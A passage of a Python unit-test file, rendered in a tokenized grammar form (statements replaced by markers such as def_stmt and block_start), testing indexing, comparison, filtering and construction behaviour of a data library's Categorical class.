result=c[[4]]<assert_stmt>result[0]<eq>'NeitherAgreeNorDisagree'<block_end><def_stmt>test_non_unique self<block_start><with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(['a' 'a' 'b' 'a' 'c' 'c' 'b'] ['a' 'a' 'b'])<block_end><block_end><def_stmt>test_match_to_category self<block_start>c=Categorical(['a' 'a' 'b' 'a' 'c' 'c' 'b'])<line_sep>result=c._categories_wrap.match_str_to_category('a')<assert_stmt>b'a'<eq>result<with_stmt>pytest.raises(TypeError)<block_start>result=c._categories_wrap.match_str_to_category([1 2 3])<block_end><with_stmt>pytest.raises(TypeError)<block_start>result=c._categories_wrap.match_str_to_category({1 2 3})<block_end>c1=Categorical(['abc' 'def' 'abc' 'abc'] np.array(['abc' 'def']) unicode=<true>)<line_sep>result=c1._categories_wrap.match_str_to_category([b'a'])<assert_stmt>result.dtype.char<eq>'U'<block_end># ------------------------------------TEST SET ITEM------------------------------------------
<def_stmt>test_set_item_str_index self<block_start>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<line_sep>correct=[2 2 2 2 2 2]<line_sep>c['a']='b'<line_sep>is_correct=bool(np.all(c.view(FastArray)<eq>correct))<assert_stmt>is_correct f"Category was not correctly changed with set item on a string."<with_stmt>pytest.raises(ValueError)<block_start>c['b']='c'<block_end><block_end><def_stmt>test_set_item_int_index self<block_start>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<line_sep>correct=[1 2 2 1 2 2]<line_sep>c[0]='a'<line_sep>is_correct=bool(np.all(c.view(FastArray)<eq>correct))<assert_stmt>is_correct f"Category was not correctly changed with set item on an int."<with_stmt>pytest.raises(ValueError)<block_start>c[0]='c'<block_end><block_end># ------------------------------------TEST CALCULATE DTYPE ----------------------------------
<def_stmt>test_get_dtype_from_len self<block_start>'''
Categorical will select different types
'''<line_sep>dtype_sizes={np.int8:1 np.int16:101 np.int32:50001 }<line_sep># , np.int64:2000000001 }
<for_stmt>dt,sz dtype_sizes.items()<block_start>LENGTH=6<line_sep>NO_CODES=sz<line_sep>alphabet=list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')<line_sep>np_alphabet=np.array(alphabet dtype="|U1")<line_sep>np_codes=np.random.choice(np_alphabet [NO_CODES LENGTH])<line_sep>codes=["".join(np_codes[i])<for>i range(len(np_codes))]<line_sep>c=Categorical(["".join(np_codes[i])<for>i range(len(np_codes))])<line_sep># only perform the test if there are enough uniques
<if_stmt>len(c._categories_wrap._list)<ge>sz<block_start><assert_stmt>c.dtype<eq>dt f"Categorical did not set dtype to {dt} for array of size {sz}."<block_end><block_end><block_end># -------SINGLE INTEGER
<def_stmt>test_getitem_int self<block_start>'''
Single integer index should return the corresponding category in unicode format.
'''<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<assert_stmt>c[0]<eq>'b' f"Get item with integer did not return the correct category."<assert_stmt>isinstance(c[0] str) f"Get item with integer did not return as unicode."<assert_stmt>c[3]<eq>'a' f"Get item with integer did not return the correct category."<assert_stmt>isinstance(c[3] str) f"Get item with integer did not return as unicode."<with_stmt>pytest.raises(IndexError)<block_start>d=c[10]<block_end><block_end># --------INTEGER MASK
<def_stmt>test_getitem_int_mask self<block_start>py_mask=[0 3]<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<for_stmt>mask [py_mask np.array(py_mask)]<block_start>d=c[mask]<assert_stmt>isinstance(d Categorical) f"Get item with integer mask did not return a categorical. Returned {type(d).__name__} instead."<assert_stmt>len(d)<eq>len(mask) f"Get item with integer mask did not return categorical of {len(mask)}. returned {len(d)} instead."<line_sep>has_same_cats=bool(np.all(d._categories_wrap._list<eq>c._categories_wrap._list))<assert_stmt>(has_same_cats) f"Failed to copy the same categories to new categorical after getitem with integer mask."<line_sep>d=c[[0 10]]<assert_stmt>d._fa[1]<eq>0 f"Failed to put invalid for out of range index."<block_end><block_end># -------BOOLEAN MASK
<def_stmt>test_getitem_bool_mask self<block_start>py_mask=[<true> <true> <true> <false> <true> <true>]<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<for_stmt>mask [py_mask np.array(py_mask)]<block_start>d=c[mask]<assert_stmt><not>(b'a'<in>d.as_string_array) f"b'a' does not get trimmed out of categorical with getitem from boolean array."<assert_stmt>5<eq>len(d) f"Length {len(d)} did not match 5 in categorical getitem with a boolean array of the same size."<line_sep>has_same_cats=bool(np.all(d._categories_wrap._list<eq>c._categories_wrap._list))<assert_stmt>(has_same_cats) f"Failed to copy the same categories to new categorical after getitem with integer mask."<block_end><block_end># -------SINGLE STRING
<def_stmt>test_getitem_single_string self<block_start>b_result=[<true> <true> <true> <false> <true> <true>]<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<line_sep>idx=b'c'<line_sep># with self.assertRaises(IndexError):
d=c[idx]<line_sep>has_true=bool(np.any(d))<assert_stmt><not>has_true f"Failed to return an array of all false for getitem with {idx}"<assert_stmt>isinstance(d FastArray) f"Get item input {idx} did not return FastArray"<assert_stmt>d.dtype.char<eq>'?' f"Get item input {idx} did not return FastArray"<line_sep>idx=idx.decode()<line_sep># with self.assertRaises(IndexError):
d=c[idx]<line_sep>has_true=bool(np.any(d))<assert_stmt><not>has_true f"Failed to return an array of all false for getitem with {idx}"<assert_stmt>isinstance(d FastArray) f"Get item input {idx} did not return FastArray"<assert_stmt>d.dtype.char<eq>'?' f"Get item input {idx} did not return FastArray"<line_sep>idx=b'b'<line_sep># with self.assertRaises(IndexError):
d=c[idx]<line_sep>is_correct=bool(np.all(d<eq>b_result))<assert_stmt>is_correct f"Did not return the correct array for getitem with {idx}"<assert_stmt>isinstance(d FastArray) f"Get item input {idx} did not return FastArray"<assert_stmt>d.dtype.char<eq>'?' f"Get item input {idx} did not return FastArray"<line_sep>idx=idx.decode()<line_sep># with self.assertRaises(IndexError):
d=c[idx]<line_sep>is_correct=bool(np.all(d<eq>b_result))<assert_stmt>is_correct f"Did not return the correct array for getitem with {idx}"<assert_stmt>isinstance(d FastArray) f"Get item input {idx} did not return FastArray"<assert_stmt>d.dtype.char<eq>'?' f"Get item input {idx} did not return FastArray"<block_end># ------MULTIPLE STRINGS
<def_stmt>test_getitem_multiple_strings self<block_start>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'])<line_sep>inputs={(b'b' ):[<true> <true> <true> <false> <true> <true>] # single in (list)
(b'c' ):[<false> <false> <false> <false> <false> <false>] # single not in (list)
(b'a' b'b'):[<true> <true> <true> <true> <true> <true>] # both in (list)
(b'c' b'd'):[<false> <false> <false> <false> <false> <false> ] # both not in (list)
(b'b' b'c'):[<true> <true> <true> <false> <true> <true>] # mixed (list)
}<for_stmt>idx,correct inputs.items()<block_start>idx=list(idx)<line_sep>d=c[idx]<line_sep>is_correct=bool(np.all(d<eq>correct))<assert_stmt>is_correct f"Indexing categorical {c} by {idx} did not return the correct result."<assert_stmt>d.dtype.char<eq>'?' f"Get item input {idx} did not return FastArray"<line_sep>idx=[b.decode()<for>b idx]<line_sep>d=c[idx]<line_sep>is_correct=bool(np.all(d<eq>correct))<assert_stmt>is_correct f"Indexing categorical {c} by {idx} did not return the correct result."<assert_stmt>d.dtype.char<eq>'?' f"Get item input {idx} did not return FastArray"<block_end><block_end># ------NUMERIC GETITEM
<def_stmt>test_getitem_numeric_categories self# before it was fixed, a bug was returning a string of the numeric category
<block_start>nums=np.array([1 1 2 3 4 5 1 1 1])<line_sep>c=Categorical(nums)<assert_stmt>c[0]<eq>1<assert_stmt>isinstance(c[0] (int np.integer))<line_sep>nums=nums.astype(np.float32)<line_sep>c=Categorical(nums)<assert_stmt>c[0]<eq>1.0<assert_stmt>isinstance(c[0] (float np.floating)) f"Expected float, got {type(c[0])}"<block_end># ------------------------- TEST COMPARE CHECK -------------------------------------------
<def_stmt>test_compare_check self<block_start>'''
Test comparison between two 'equal' categoricals with different underlying arrays.
'''<line_sep>compare_ops={'__ne__':[<false> <false> <false> <false> <false> <false>] '__eq__':[<true> <true> <true> <true> <true> <true>] '__ge__':[<true> <true> <true> <true> <true> <true>] '__gt__':[<false> <false> <false> <false> <false> <false>] '__le__':[<true> <true> <true> <true> <true> <true>] '__lt__':[<false> <false> <false> <false> <false> <false>] }<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b' 'c'])<line_sep>d=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<for_stmt>name,correct compare_ops.items()<block_start>func=c.__getattribute__(name)<line_sep>result=func(d)<line_sep>is_correct=bool(np.all(result<eq>correct))<assert_stmt>is_correct f"Compare operation betweeen two equal categoricals did not return the correct result."<block_end><block_end><def_stmt>test_compare_return_type self<block_start>'''
Test comparison operations with single strings to make sure FastArray of boolean is returned.
'''<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<line_sep>scalars=['a' 'c']<line_sep>compare_ops=['__ne__' '__eq__' '__ge__' '__gt__' '__le__' '__lt__']<for_stmt>s scalars<block_start><for_stmt>op compare_ops<block_start>func=c.__getattribute__(op)<line_sep>result=func(s)<assert_stmt>isinstance(result FastArray) f"comparison {op} with input {s} did not return FastArray"<assert_stmt>result.dtype.char<eq>'?' f"comparison {op} with input {s} did not return boolean"<block_end><block_end><block_end><def_stmt>test_compare_different_modes self<block_start>c1=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<line_sep>c2=Categorical([0 1] {0:'a' 1:'b'})<with_stmt>pytest.raises(TypeError)<block_start>c1<eq>c2<block_end><block_end><def_stmt>test_compare_conflicting_dicts self<block_start>c1=Categorical([0 1] {0:'a' 1:'b'})<line_sep>c2=Categorical([0 1] {1:'a' 0:'b'})<with_stmt>pytest.raises(ValueError)<block_start>c1<eq>c2<block_end><block_end><def_stmt>test_compare_safe_dicts self<block_start>c1=Categorical([0 1] {0:'a' 1:'b'})<line_sep>c2=Categorical([2 1] {2:'c' 1:'b'})<line_sep>correct=FastArray([<false> <true>])<line_sep>result=c1<eq>c2<line_sep>match=bool(np.all(correct<eq>result))<assert_stmt>match<block_end><def_stmt>test_isnan self<block_start>c=Categorical([1 1 3 2 2] ['a' 'b' 'c'] base_index=1 invalid='a')<line_sep>is_correct=[<true> <true> <false> <false> <false>]<line_sep>is_not_correct=[<false> <false> <true> <true> <true>]<assert_stmt>bool(np.all(is_correct<eq>isnan(c)))<assert_stmt>bool(np.all(is_correct<eq>c.isnan()))<assert_stmt>bool(np.all(is_not_correct<eq>isnotnan(c)))<assert_stmt>bool(np.all(is_not_correct<eq>c.isnotnan()))<block_end># ------------------------------------------------------
<def_stmt>test_get_categories self# string list
<block_start>c=Categorical(['a' 'b' 'c' 'd' 'e'])<line_sep>catsarray=c.category_array<assert_stmt>isinstance(catsarray np.ndarray)<line_sep>catsdict=c.category_dict<assert_stmt>isinstance(catsdict dict)<assert_stmt>len(catsdict)<eq>1<with_stmt>pytest.raises(TypeError)<block_start>catscodes=c.category_codes<block_end><with_stmt>pytest.raises(TypeError)<block_start>catsmapping=c.category_mapping<block_end># numeric list
c=Categorical(np.array([1 2 3 4 5]))<line_sep>catsarray=c.category_array<assert_stmt>isinstance(catsarray np.ndarray)<line_sep>catsdict=c.category_dict<assert_stmt>isinstance(catsdict dict)<assert_stmt>len(catsdict)<eq>1<with_stmt>pytest.raises(TypeError)<block_start>catscodes=c.category_codes<block_end><with_stmt>pytest.raises(TypeError)<block_start>catsmapping=c.category_mapping<block_end># dict/enum
c=Categorical([1 2 3 4] {1:'a' 2:'b' 3:'c' 4:'d'})<line_sep>catsarray=c.category_array<assert_stmt>isinstance(catsarray np.ndarray)<line_sep>catsdict=c.category_dict<assert_stmt>isinstance(catsdict dict)<assert_stmt>len(catsdict)<eq>1<line_sep>catscodes=c.category_codes<assert_stmt>isinstance(catscodes np.ndarray)<line_sep>catsmapping=c.category_mapping<assert_stmt>isinstance(catsmapping dict)<line_sep># multikey
c=Categorical([np.arange(5) np.random.rand(5)])<with_stmt>pytest.raises(TypeError)<block_start>catsarray=c.category_array<block_end>catsdict=c.category_dict<assert_stmt>isinstance(catsdict dict)<assert_stmt>len(catsdict) 2<with_stmt>pytest.raises(TypeError)<block_start>catscodes=c.category_codes<block_end><with_stmt>pytest.raises(TypeError)<block_start>catsmapping=c.category_mapping<block_end><block_end># ------------------------------------------------------
<def_stmt>test_force_base_index2 self<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'])<assert_stmt>c.base_index<eq>1<assert_stmt>c._fa[0]<eq>1<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'] base_index=0)<assert_stmt>c.base_index<eq>0<assert_stmt>c._fa[0]<eq>0<line_sep>codes=np.array([0 0 1 2 0])<line_sep>cats=np.array(['a' 'b' 'c'])<line_sep># c = Categorical(codes, cats)
# self.assertEqual(c.base_index, 0)
# self.assertEqual(c._fa[0], 0)
codes<augadd>1<line_sep>c=Categorical(codes cats base_index=1)<assert_stmt>c.base_index<eq>1<assert_stmt>c._fa[0]<eq>1<line_sep>codes=codes.astype(np.float32)<line_sep>c=Categorical(codes cats from_matlab=<true>)<assert_stmt>c.base_index<eq>1<assert_stmt>c._fa[0]<eq>1<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(codes cats from_matlab=<true> base_index=0)<block_end>c=Categorical(np.array(['a' 'a' 'b' 'c' 'a']) np.array(['a' 'b' 'c']))<assert_stmt>c.base_index<eq>1<assert_stmt>c._fa[0]<eq>1<line_sep>c=Categorical(np.array(['a' 'a' 'b' 'c' 'a']) np.array(['a' 'b' 'c']) base_index=0)<assert_stmt>c.base_index<eq>0<assert_stmt>c._fa[0]<eq>0<block_end># ------------------------------------------------------
<def_stmt>test_ordered self<block_start>c=Categorical(['c' 'c' 'a' 'b' 'c'])<line_sep>cats=c.category_array<assert_stmt>cats[0]<eq>b'a'<line_sep>c=Categorical(['c' 'c' 'a' 'b' 'c'] ordered=<false>)<line_sep>cats=c.category_array<assert_stmt>cats[0]<eq>b'c'<line_sep>c=Categorical(['c' 'c' 'a' 'b' 'c'] ['c' 'a' 'b'])<line_sep>cats=c.category_array<assert_stmt>cats[0]<eq>b'c'<assert_stmt><not>c.ordered<line_sep>c=Categorical(['c' 'c' 'a' 'b' 'c'] ['a' 'b' 'c'])<assert_stmt>c.ordered<line_sep>## removed this test - side-effect of search sorted with unsorted array (not categorical related)
## false claim that categories are ordered in keyword
# c = Categorical(['c','c','a','c','c'], ['c','a','b'], ordered=True)
# self.assertTrue(bool(np.all(c!='c')))
# self.assertTrue(bool(np.all(c!=b'c')))
c=Categorical(['c' 'c' 'a' 'b' 'c'] ['c' 'a' 'b'] ordered=<false>)<line_sep>cats=c.category_array<assert_stmt>cats[0]<eq>b'c'<assert_stmt><not>c.ordered<line_sep>codes=FastArray([0 0 1 2 0])<line_sep>cats=FastArray(['c' 'b' 'a'] unicode=<true>)<line_sep>c=Categorical(codes cats)<assert_stmt>c.category_array[0]<eq>'c'<assert_stmt><not>c.ordered<line_sep># with self.assertWarns(UserWarning):
# c = Categorical(codes, cats, ordered=True)
# self.assertEqual(c.category_array[0], b'c')
# self.assertFalse(c.ordered)
<block_end># ------------------------------------------------------
<def_stmt>test_keywords_not_allowed self# filter + base index 0
<block_start>f=np.array([<true> <false> <true>])<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(['a' 'b' 'c'] filter=f base_index=0)<block_end><block_end># ------------------------------------------------------
<def_stmt>test_display_properties self<block_start>'''
Categoricals take over their display properties to appear like strings (not the underlying integer array)
(see Utils.rt_display_properties)
'''<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<line_sep>item_format,convert_func=c.display_query_properties()<assert_stmt>item_format.length<eq>DisplayLength.Long f"Incorrect length for item format."<assert_stmt>item_format.justification<eq>DisplayJustification.Left<assert_stmt>item_format.invalid<eq><none><assert_stmt>item_format.can_have_spaces<eq><true><assert_stmt>item_format.decoration<eq><none><assert_stmt>item_format.color<eq>DisplayColumnColors.Default<assert_stmt>convert_func.__name__<eq>'display_convert_func'<line_sep># this could change, right now the convert function just does a str over the item
<assert_stmt>convert_func(1 item_format)<eq>'1' f"Incorrect convert function was returned."<block_end># ------------------------------------------------------
# -----MISC. COVER TESTS--------------------------------
<def_stmt>test_non_array_dict_categories_ctor self<block_start><with_stmt>pytest.raises(TypeError)<block_start>c=Categories(['garbage' 'list'])<block_end><block_end><def_stmt>test_too_many_args_categories_ctor self<block_start><with_stmt>pytest.raises(ValueError)<block_start>c=Categories(FastArray([1]) FastArray([2]) FastArray([3]))<block_end><block_end><def_stmt>test_filter_and_invalid self<block_start>c=Categorical(['a' 'a' 'b' 'c' 'c'] ['c'] invalid='a' filter=FastArray([<true> <true> <false> <true> <true>]) )<line_sep>c.filtered_set_name('a')<assert_stmt>bool(np.all(c._fa<eq>[0 0 0 1 1]))<for_stmt>i range(3)<block_start><assert_stmt>c[i]<eq>'a'<block_end><for_stmt>i range(3 5)<block_start><assert_stmt>c[i]<eq>'c'<block_end><block_end><def_stmt>test_zero_base_with_invalid self<block_start><with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(['a' 'b' 'c'] ['b' 'c'] base_index=0)<block_end><block_end># removed this property from Categories 04/24/2019
# def test_multikey_labels(self):
# c = Categorical([FastArray(['a','b','c']), FastArray([1,2,3])])
# labels = c._categories_wrap.multikey_labels
# self.assertTrue(isinstance(labels[0], tuple))
# self.assertEqual(labels[0][0],'a')
<def_stmt>test_ncols_non_multikey self<block_start>c=Categorical(['a' 'b' 'c'])<assert_stmt>c._categories_wrap.ncols<eq>1<block_end># now checks for single / multikey / enum, not CategoryMode
# def test_len_undefined_mode(self):
# c = Categorical(['a','b','c'])
# c._categories_wrap._mode = CategoryMode.Default
# self.assertEqual(len(c._categories_wrap),0)
<def_stmt>test_categories_copy_shallow self<block_start>c=Categorical(['a' 'b' 'c'])<line_sep>copycat=c._categories_wrap.copy(deep=<false>)<assert_stmt>isinstance(copycat Categories)<block_end><def_stmt>test_categories_copy_deep self<block_start>c=Categorical([1 2 3] {1:'a' 2:'b' 3:'c'})<line_sep>copycat=c._categories_wrap.copy(deep=<false>)<assert_stmt>isinstance(copycat Categories)<line_sep># impossible path, unless mode is forced like below. disabling 4/24/2019
# c._categories_wrap._mode = CategoryMode.Default
# with self.assertRaises(NotImplementedError):
# c = c._categories_wrap.copy()
<block_end><def_stmt>test_wrap_get_categories self<block_start>c=Categorical(['a' 'b' 'c'])<line_sep>arr=c._categories_wrap.get_categories()<assert_stmt>isinstance(arr FastArray)<line_sep>c=Categorical([FastArray(['a' 'b' 'c']) FastArray([1 2 3])])<line_sep>d=c._categories_wrap.get_categories()<assert_stmt>isinstance(d dict)<block_end><def_stmt>test_get_string_mode_nums self<block_start>c=Categorical(np.arange(5))<assert_stmt><not>c._categories_wrap.isbytes<assert_stmt><not>c._categories_wrap.isunicode<block_end><def_stmt>test_pop_single_arr self<block_start>c=Categorical([np.array(['a' 'b' 'c'])])<line_sep>d=Categorical(np.array(['a' 'b' 'c']))<assert_stmt>bool(np.all(c<eq>d))<line_sep>c=Categorical({'test':np.array(['a' 'b' 'c'])})<line_sep>d=Categorical(np.array(['a' 'b' 'c']))<assert_stmt>bool(np.all(c<eq>d))<block_end><def_stmt>test_from_cat_as_array self<block_start>c=Categorical(FastArray([1 2 3]) _from_categorical=np.array(['a' 'b' 'c']))<assert_stmt>isinstance(c.category_array FastArray)<assert_stmt>c.base_index<eq>1<block_end><def_stmt>test_from_pandas_object self<block_start>pdc=pd.Categorical(['a' 'b' 'c'])<line_sep>c=Categorical(pdc unicode=<true>)<assert_stmt>c.category_array.dtype.char<eq>'U'<line_sep>c=Categorical(pdc unicode=<false>)<assert_stmt>c.category_array.dtype.char<eq>'S'<line_sep>pdc=pd.Categorical(three_unicode)<line_sep>c=Categorical(pdc)<assert_stmt>c.category_array.dtype.char<eq>'U'<block_end><def_stmt>test_empty_init self<block_start><with_stmt>pytest.raises(ValueError)<block_start>c=Categorical({})<block_end><with_stmt>pytest.raises(ValueError)<block_start>c=Categorical([])<block_end><block_end><def_stmt>test_multi_with_cats self<block_start><with_stmt>pytest.raises(NotImplementedError)<block_start>c=Categorical([FastArray(['a' 'b' 'c' 'a']) FastArray([1 2 3 1])] [FastArray(['a' 'b' 'c']) FastArray([1 2 3])] )<block_end><block_end># 5/9/2019 removed this warning to reduce constructor paths
# def test_unicode_warn(self):
# with self.assertWarns(UserWarning):
# c = Categorical([1,2,3],{1:'a',2:'b',3:'c'}, unicode=False)
<def_stmt>test_map_non_integer self<block_start><with_stmt>pytest.raises(TypeError)<block_start>c=Categorical([1.0 2.0 3.0] {1:'a' 2:'b' 3:'c'})<block_end><block_end><def_stmt>test_category_multi_arrays self<block_start><with_stmt>pytest.raises(TypeError)<block_start>c=Categorical([1 2 3] [np.arange(5) np.arange(5)])<block_end><block_end><def_stmt>test_getitem_enum_list2 self<block_start>c=Categorical([1 1 2 3 1] {'a':1 'b':2 'c':3})<line_sep>d=c[[1 2 3]]<assert_stmt>d[0]<eq>'a'<block_end><def_stmt>test_tuple_compare_error self<block_start>c=Categorical([FastArray(['a' 'b' 'c' 'a']) FastArray([1 2 3 1])])<with_stmt>pytest.raises(ValueError)<block_start>_=c<eq>('a' 'b' 'c')<block_end><block_end><def_stmt>test_filter_out_bytes_from_unicode self<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'] unicode=<true> invalid=b'a')<assert_stmt>bool(np.all(c._fa<eq>[1 1 2 3 1]))<assert_stmt>c.category_array.dtype.char<eq>'U'<assert_stmt>'a'<in>c.category_array<block_end><def_stmt>test_bytes_compare_multikey self<block_start>c=Categorical([np.array(['a' 'b' 'c' 'a']) FastArray([1 2 3 1])] unicode=<true>)<line_sep>cols=c.category_dict<line_sep>bytescol=list(cols.values())[0]<assert_stmt>bytescol.dtype.char<eq>'U'<line_sep>result=c<eq>(b'a' 1)<assert_stmt>bool(np.all(FastArray([<true> <false> <false> <true>])<eq>result))<block_end><def_stmt>test_cat_zero_wronge_base self<block_start><with_stmt>pytest.raises(ValueError)<block_start>c=CatZero(['a' 'a' 'b' 'c' 'a'] base_index=1)<block_end><block_end><def_stmt>test_preserve_name self<block_start>ds=TypeRegister.Dataset({'strcol':np.random.choice(['a' 'b' 'c'] 10) 'numcol':arange(10)})<line_sep>c=Categorical(ds.strcol)<assert_stmt>c.get_name()<eq>'strcol'<line_sep>c=Categorical([ds.strcol ds.numcol])<line_sep>ds2=c.sum(arange(10))<line_sep>labels=ds2.label_get_names()<assert_stmt>labels[0]<eq>'strcol'<assert_stmt>labels[1]<eq>'numcol'<line_sep>ds=TypeRegister.Dataset({'mycodes':np.random.randint(1 4 10)})<line_sep>c=Categorical(ds.mycodes {'a':1 'b':2 'c':3})<assert_stmt>c.get_name()<eq>'mycodes'<line_sep>codes=np.random.randint(1 4 10)<line_sep>cats=FastArray(['a' 'b' 'c'])<line_sep>cats.set_name('test')<line_sep>c=Categorical(codes cats)<assert_stmt>c.get_name() 'test'<block_end><def_stmt>test_subarray_name self<block_start>c=Categorical(['a' 'b'])<line_sep>c1=c[[0]]<assert_stmt>c1.get_name()<eq>c.get_name()<line_sep># Make sure there is no "quantum effect" that printing the array changes it's name.
_=str(c1)<assert_stmt>c1.get_name()<eq>c.get_name()<block_end><def_stmt>test_construct_from_categorical self<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'])<line_sep>d=Categorical(c)<assert_stmt>isinstance(d.category_array np.ndarray)<assert_stmt>isinstance(d.expand_array np.ndarray)<line_sep>d2=Categorical([c])<assert_stmt>isinstance(d2.category_array np.ndarray)<assert_stmt>isinstance(d2.expand_array np.ndarray)<block_end><def_stmt>test_total_size self<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'])<assert_stmt>c._total_size<eq>8<line_sep>c=Categorical([arange(5 dtype=np.int32) arange(5 dtype=np.int32)])<assert_stmt>c._total_size<eq>45<line_sep>c=Categorical([arange(5 dtype=np.int64) arange(5 dtype=np.int64)])<assert_stmt>c._total_size<eq>85<block_end># removed while modifying groupby calculation behavior
# def test_hold_dataset(self):
# ds = TypeRegister.Dataset({'strcol':np.random.choice(['a','b','c'],30), 'numcol':arange(30)})
# c = ds.cat('strcol')
# self.assertTrue(isinstance(c._dataset, TypeRegister.Dataset))
# result = c.sum()
# self.assertTrue(isinstance(result, TypeRegister.Dataset))
# self.assertEqual(result._nrows, 3)
<def_stmt>test_expand_dict self<block_start>og_strings=FastArray(['a' 'a' 'b' 'c' 'a'])<line_sep>og_nums=arange(5)<line_sep>c=Categorical([og_strings og_nums])<line_sep>d=c.expand_dict<assert_stmt>isinstance(d dict)<assert_stmt>len(d)<eq>2<line_sep>dictlist=list(d.values())<assert_stmt>bool(np.all(dictlist[0]<eq>og_strings))<assert_stmt>bool(np.all(dictlist[1]<eq>og_nums))<line_sep>c=Categorical([1 2 3] {'a':1 'b':2 'c':3})<line_sep>d=c.expand_dict<assert_stmt>isinstance(d dict)<assert_stmt>len(d)<eq>1<line_sep>dictlist=list(d.values())<assert_stmt>bool(np.all(dictlist[0]<eq>arange(1 4)))<line_sep>c=Categorical(np.random.randint(0 10 100_100))<with_stmt>pytest.warns(UserWarning)<block_start>d=c.expand_dict<block_end><block_end><def_stmt>test_expand_array self<block_start>c=Categorical([1 2 3] {'a':1 'b':2 'c':3})<line_sep>arr=c.expand_array<assert_stmt>bool(np.all(arr<eq>arange(1 4)))<line_sep>c=Categorical([FastArray(['a' 'b' 'c' 'a']) FastArray([1 2 3 1])])<line_sep># expand array now works on multikey categoricals, returns a tuple of expanded arrays SJK: 4/29/2019
multi_expand=c.expand_array<assert_stmt>isinstance(multi_expand tuple)<assert_stmt>len(multi_expand)<eq>2<assert_stmt>bool(np.all(FastArray(['a' 'b' 'c' 'a'])<eq>multi_expand[0]))<assert_stmt>bool(np.all(FastArray([1 2 3 1])<eq>multi_expand[1]))<line_sep>c._fa[:]=0<line_sep>multi_expand=c.expand_array<assert_stmt>bool(np.all(isnan(multi_expand[1])))<assert_stmt>bool(np.all(multi_expand[0]<eq>b'Filtered'))<block_end><def_stmt>test_true_false_spacer self<block_start>c=Categorical(['a' 'b' 'c'])<line_sep>t_true=c._tf_spacer(['test' <true>])<assert_stmt>t_true<eq>'testTrue '<line_sep>t_false=c._tf_spacer(['test' <false>])<assert_stmt>t_false<eq>'testFalse'<block_end><def_stmt>test_mapping_hstack self<block_start>c1=Categorical([1 1 1 1 2 3] {'a':1 'b':2 'c':3})<line_sep>c2=Categorical([1 1 1 1 3 4] {'a':1 'c':3 'd':4})<line_sep>stacked=Categorical.hstack([c1 c2])<assert_stmt>stacked.unique_count<eq>4<assert_stmt>stacked.from_category('b')<eq>2<assert_stmt>stacked.from_category('d')<eq>4<assert_stmt>len(stacked)<eq>12<line_sep>c1=Categorical([1 1 1 1 2 3] {'a':1 'b':2 'd':3})<line_sep>c2=Categorical([1 1 1 1 3 4] {'a':1 'c':3 'd':4})<line_sep># removed, hstack now relies on unique codes only SJK: 3/5/2019
# with self.assertRaises(TypeError):
# c3 = Categorical.hstack([c1, c2])
<block_end><def_stmt>test_matlab_nan self<block_start>dts=[np.int8 np.int16 np.int32 np.int64]<line_sep>matlab_float_idx=FastArray([1.0 0.0 np.nan])<line_sep>matlab_cats=['a' 'b']<for_stmt>dt dts<block_start>c=Categorical(matlab_float_idx matlab_cats dtype=dt from_matlab=<true>)<assert_stmt>bool(np.all(c._fa<eq>[1 0 0])) f'failed to flip nan to zero for dtype {dt}'<assert_stmt>np.dtype(dt)<eq>c.dtype<block_end><block_end><def_stmt>test_from_provided_with_filter self# not found and filter
<block_start>c=Categorical(['a' 'a' 'b' 'c' 'd'] ['a' 'b' 'c'] filter=FastArray([<false> <false> <true> <true> <false>]) invalid='INVALID' )<line_sep>c.filtered_set_name('INVALID')<line_sep>correct=FastArray([b'INVALID' b'INVALID' b'b' b'c' b'INVALID'])<assert_stmt>bool(np.all(c.expand_array<eq>correct))<line_sep># filter only (uses default invalid)
c=Categorical(['a' 'a' 'b' 'c'] ['a' 'b' 'c'] filter=FastArray([<false> <false> <true> <true>]) )<line_sep>f=c.filtered_name<line_sep>correct=FastArray([f f b'b' b'c'])<assert_stmt>bool(np.all(c.expand_array<eq>correct))<line_sep># even though filtered out, categories still untouched
correct=FastArray([b'a' b'b' b'c'])<assert_stmt>bool(np.all(c.category_array<eq>correct))<line_sep># filtering not allowed for base index 0
<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(['a' 'a' 'b' 'c'] ['a' 'b' 'c'] filter=FastArray([<false> <false> <true> <true>]) base_index=0 )<block_end><block_end><def_stmt>test_numeric_invalid self# 5/16/2019 invalid category must be in provided uniques
